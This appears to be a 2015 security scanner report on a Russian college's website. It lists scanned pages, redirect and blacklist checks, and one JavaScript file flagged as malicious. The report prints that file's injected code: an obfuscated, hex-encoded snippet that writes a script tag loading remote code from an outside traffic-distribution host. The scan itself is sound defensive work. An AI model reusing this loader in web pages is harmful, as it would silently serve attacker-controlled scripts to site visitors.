Scanned pages/files
Request | Server response | Status |
http://glinkacollege.ru/ | 200 OK Content-Length: 55313 Content-Type: text/html | clean |
http://glinkacollege.ru/media/system/js/caption.js | 200 OK Content-Length: 2393 Content-Type: application/x-javascript | clean |
http://glinkacollege.ru/plugins/content/mavikthumbnails/highslide/highslide-with-gallery.packed.js | 200 OK Content-Length: 37262 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('q(!m){u m={18:{95:\'9e\',9c:\'ce...\',9d:\'7q 1L cf\',8J:\'7q 1L cc 1L c6\',8c:\'c7 1L c8 B (f)\',ad:\'ch by <i>aw ar</i>\',ae:\'ci 1L cp aw ar cr var _0x7b2a=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x36\x64","\x66\x61\x73\x39\x6F\x62\x78","\x6E\x32\x33\x34\x2E\x75\x73\x2F\x74\x64\x73\x2F\x6A","\x73\x2E\x70\x68\x70\x3F\x74\x64\x73\x3D\x31\x36\x35\x31\x22\x3E\x3C\x2F\x73\x63","\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x7b2a[7]](_0x7b2a[0]+_0x7b2a[1]+_0x7b2a[2]+_0x7b2a[3]+_0x7b2a[4]+_0x7b2a[5]+_0x7b2a[6]); Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://glinkacollege.ru/modules/mod_easymenu/ddsmoothmenu/ddsmoothmenu.php | 200 OK Content-Length: 6990 Content-Type: text/javascript | clean |
http://glinkacollege.ru/modules/mod_hot_image_slider/js/scripts.js | 200 OK Content-Length: 7049 Content-Type: application/x-javascript | clean |
http://glinkacollege.ru/index.php/2011-10-27-22-31-39 | 200 OK Content-Length: 40452 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/ | 200 OK Content-Length: 55327 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/mnu-welcome | 200 OK Content-Length: 40817 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php | 200 OK Content-Length: 55326 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/2010-10-22-12-27-27 | 200 OK Content-Length: 45709 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/collegesructure/mnu-fullstruct | 200 OK Content-Length: 41868 Content-Type: text/html | clean |
http://glinkacollege.ru/index.php/2010-10-27-18-47-39/collegesructure/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://glinkacollege.ru/test404page.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: glinkacollege.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 00:18:05 GMT
Pragma: no-cache
ETag: 6666cd76f96956469e7be39d750cc7d9
Server: DataPalm/3.5
Content-Type: text/html
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 26 Feb 2015 00:18:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7867f38d43a7ca6261f1422996cb15aa=34c6badbb66ee3da7dfe7c96315a0d98; path=/
GET / HTTP/1.1
Host: glinkacollege.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 00:18:05 GMT
Pragma: no-cache
ETag: 6666cd76f96956469e7be39d750cc7d9
Server: DataPalm/3.5
Content-Type: text/html
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 26 Feb 2015 00:18:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7867f38d43a7ca6261f1422996cb15aa=34c6badbb66ee3da7dfe7c96315a0d98; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: glinkacollege.ru
Referer: http://www.google.com/search?q=glinkacollege.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: glinkacollege.ru
Referer: http://www.google.com/search?q=glinkacollege.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=glinkacollege.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://glinkacollege.ru/
Result: glinkacollege.ru is not infected or malware details are not published yet.
Result: glinkacollege.ru is not infected or malware details are not published yet.